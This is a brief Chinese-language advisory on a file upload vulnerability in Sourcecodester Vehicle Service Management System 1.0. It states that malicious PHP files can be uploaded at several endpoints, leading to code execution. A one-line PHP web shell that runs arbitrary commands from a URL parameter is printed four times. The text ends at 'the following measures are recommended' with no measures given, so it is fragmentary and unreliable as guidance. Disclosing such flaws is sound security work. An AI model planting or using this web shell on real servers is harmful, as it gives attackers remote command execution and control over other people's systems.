Sourcecodester Vehicle Service Management System 1.0 存在文件上传漏洞。攻击者可以在多个端点上传恶意 php 文件,从而导致代码执行。
<?php system($_GET['cmd']);?>
<?php system($_GET['cmd']);?>
<?php system($_GET['cmd']);?>
<?php system($_GET['cmd']);?>
攻击者能够在多个端点上传恶意 php 文件,从而导致代码执行。
建议实施以下措施: